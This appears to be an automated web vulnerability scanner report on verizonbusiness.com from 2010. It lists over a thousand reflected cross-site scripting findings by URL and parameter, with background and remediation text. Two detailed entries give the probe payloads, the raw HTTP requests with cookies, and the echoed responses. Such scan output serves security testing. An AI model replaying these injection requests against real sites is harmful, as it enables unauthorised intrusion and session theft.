1.905. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 2]

1.906. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 2]

1.907. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 3]

1.908. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 3]

1.909. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 1]

1.910. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 1]

1.911. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 2]

1.912. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 2]

1.913. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 1]

1.914. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 1]

1.915. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 2]

1.916. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 2]

1.917. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 3]

1.918. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 3]

1.919. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 1]

1.920. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 1]

1.921. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 2]

1.922. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 2]

1.923. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 3]

1.924. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 3]

1.925. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 1]

1.926. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 1]

1.927. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 2]

1.928. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 2]

1.929. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 3]

1.930. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 3]

1.931. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 1]

1.932. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 1]

1.933. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 2]

1.934. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 2]

1.935. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 3]

1.936. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 3]

1.937. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 1]

1.938. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 1]

1.939. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 2]

1.940. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 2]

1.941. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 3]

1.942. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 3]

1.943. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 1]

1.944. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 1]

1.945. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 2]

1.946. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 2]

1.947. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 3]

1.948. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 3]

1.949. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 1]

1.950. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 1]

1.951. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 2]

1.952. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 2]

1.953. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 3]

1.954. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 3]

1.955. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 1]

1.956. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 1]

1.957. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 2]

1.958. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 2]

1.959. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 3]

1.960. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 3]

1.961. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 1]

1.962. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 1]

1.963. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 2]

1.964. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 2]

1.965. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 3]

1.966. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 3]

1.967. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 1]

1.968. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 1]

1.969. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 2]

1.970. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 2]

1.971. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 3]

1.972. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 3]

1.973. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 1]

1.974. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 1]

1.975. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 2]

1.976. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 2]

1.977. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 3]

1.978. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 3]

1.979. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 1]

1.980. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 1]

1.981. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 2]

1.982. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 2]

1.983. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 3]

1.984. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 3]

1.985. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 1]

1.986. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 1]

1.987. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 2]

1.988. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 2]

1.989. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 3]

1.990. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 3]

1.991. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 1]

1.992. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 1]

1.993. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 2]

1.994. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 2]

1.995. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 3]

1.996. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 3]

1.997. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 1]

1.998. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 1]

1.999. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 2]

1.1000. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 2]

1.1001. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 3]

1.1002. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 3]

1.1003. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 1]

1.1004. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 1]

1.1005. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 2]

1.1006. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 2]

1.1007. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 1]

1.1008. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 1]

1.1009. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 2]

1.1010. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 2]

1.1011. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 1]

1.1012. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 1]

1.1013. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 2]

1.1014. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 2]

1.1015. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 1]

1.1016. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 1]

1.1017. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 2]

1.1018. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 2]

1.1019. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 1]

1.1020. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 1]

1.1021. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 2]

1.1022. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 2]

1.1023. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 1]

1.1024. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 1]

1.1025. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 2]

1.1026. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 2]

1.1027. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 1]

1.1028. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 1]

1.1029. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 2]

1.1030. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 2]

1.1031. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 3]

1.1032. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 3]

1.1033. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 1]

1.1034. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 1]

1.1035. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 2]

1.1036. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 2]

1.1037. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 1]

1.1038. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 1]

1.1039. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 2]

1.1040. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 2]

1.1041. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 3]

1.1042. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 3]

1.1043. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 1]

1.1044. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 1]

1.1045. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 2]

1.1046. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 2]

1.1047. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 3]

1.1048. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 3]

1.1049. http://www.verizonbusiness.com/support/ [REST URL parameter 1]

1.1050. http://www.verizonbusiness.com/support/ [REST URL parameter 1]

1.1051. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 1]

1.1052. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 1]

1.1053. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 2]

1.1054. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 2]

1.1055. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 1]

1.1056. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 1]

1.1057. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 2]

1.1058. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 2]

1.1059. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 3]

1.1060. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 3]

1.1061. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 1]

1.1062. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 1]

1.1063. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 2]

1.1064. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 2]

1.1065. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 3]

1.1066. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 3]

1.1067. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 4]

1.1068. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 4]

1.1069. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 1]

1.1070. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 1]

1.1071. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 2]

1.1072. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 2]

1.1073. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 3]

1.1074. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 3]

1.1075. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 4]

1.1076. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 4]

1.1077. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 1]

1.1078. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 1]

1.1079. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 2]

1.1080. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 2]

1.1081. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 3]

1.1082. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 3]

1.1083. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 4]

1.1084. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 4]

1.1085. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 1]

1.1086. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 1]

1.1087. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 2]

1.1088. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 2]

1.1089. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 1]

1.1090. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 1]

1.1091. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 2]

1.1092. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 2]

1.1093. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 1]

1.1094. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 1]

1.1095. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 2]

1.1096. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 2]

1.1097. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 4]

1.1098. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 4]

1.1099. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 1]

1.1100. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 1]

1.1101. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 2]

1.1102. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 2]

1.1103. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 3]

1.1104. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 3]

1.1105. http://www.verizonbusiness.com/terms/ [REST URL parameter 1]

1.1106. http://www.verizonbusiness.com/terms/ [REST URL parameter 1]

1.1107. http://www.verizonbusiness.com/thinkforward/ [REST URL parameter 1]

1.1108. http://www.verizonbusiness.com/thinkforward/ [REST URL parameter 1]

1.1109. http://www.verizonbusiness.com/topnav.xml [REST URL parameter 1]

1.1110. http://www.verizonbusiness.com/topnav.xml [REST URL parameter 1]

1.1111. http://www.verizonbusiness.com/tw/ [REST URL parameter 1]

1.1112. http://www.verizonbusiness.com/tw/ [REST URL parameter 1]

1.1113. http://www.verizonbusiness.com/uk/ [REST URL parameter 1]

1.1114. http://www.verizonbusiness.com/uk/ [REST URL parameter 1]

1.1115. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 1]

1.1116. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 1]

1.1117. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 2]

1.1118. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 2]

1.1119. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 3]

1.1120. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 3]

1.1121. http://www.verizonbusiness.com/us/ [REST URL parameter 1]

1.1122. http://www.verizonbusiness.com/us/ [REST URL parameter 1]

1.1123. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 1]

1.1124. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 1]

1.1125. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 2]

1.1126. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 2]

1.1127. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 3]

1.1128. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 3]

1.1129. http://www.verizonbusiness.com/us/support/ [REST URL parameter 1]

1.1130. http://www.verizonbusiness.com/us/support/ [REST URL parameter 1]

1.1131. http://www.verizonbusiness.com/us/support/ [REST URL parameter 2]

1.1132. http://www.verizonbusiness.com/us/support/ [REST URL parameter 2]

1.1133. http://www.verizonbusiness.com/ve/ [REST URL parameter 1]

1.1134. http://www.verizonbusiness.com/ve/ [REST URL parameter 1]

1.1135. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

1.1136. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

1.1137. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

1.1138. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

1.1139. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

1.1140. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

1.1141. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 4]

1.1142. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 1]

1.1143. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 1]

1.1144. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 2]

1.1145. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 2]

1.1146. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 3]

1.1147. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 3]

1.1148. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 4]

1.1149. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 4]

1.1150. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

1.1151. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

1.1152. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

1.1153. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

1.1154. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

1.1155. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

1.1156. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 4]

1.1157. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

1.1158. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

1.1159. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

1.1160. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

1.1161. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

1.1162. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

1.1163. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 4]

1.1164. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]

1.1165. http://www.verizonbusiness.com/ar/ [User-Agent HTTP header]

1.1166. http://www.verizonbusiness.com/at/ [User-Agent HTTP header]

1.1167. http://www.verizonbusiness.com/cl/ [User-Agent HTTP header]

1.1168. http://www.verizonbusiness.com/co/ [User-Agent HTTP header]

1.1169. http://www.verizonbusiness.com/de/ [User-Agent HTTP header]

1.1170. http://www.verizonbusiness.com/es/ [User-Agent HTTP header]

1.1171. http://www.verizonbusiness.com/fr/ [User-Agent HTTP header]

1.1172. http://www.verizonbusiness.com/jp/ [User-Agent HTTP header]

1.1173. http://www.verizonbusiness.com/mx/ [User-Agent HTTP header]

1.1174. http://www.verizonbusiness.com/pa/ [User-Agent HTTP header]

1.1175. http://www.verizonbusiness.com/ve/ [User-Agent HTTP header]



1. Cross-site scripting (reflected)
There are 1175 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.verizonbusiness.com/Medium/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0f9"%3b46e9706f56f was submitted in the REST URL parameter 1. This input was echoed as 6d0f9";46e9706f56f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium6d0f9"%3b46e9706f56f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:03 GMT
Content-Type: text/html
Content-Length: 21448
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium6d0f9";46e9706f56f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.2. http://www.verizonbusiness.com/Medium/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e43b'%3bf51cd8dd011 was submitted in the REST URL parameter 1. This input was echoed as 5e43b';f51cd8dd011 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium5e43b'%3bf51cd8dd011/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42595
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium5e43b';f51cd8dd011/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.3. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 1]

Summary

Severity:   High
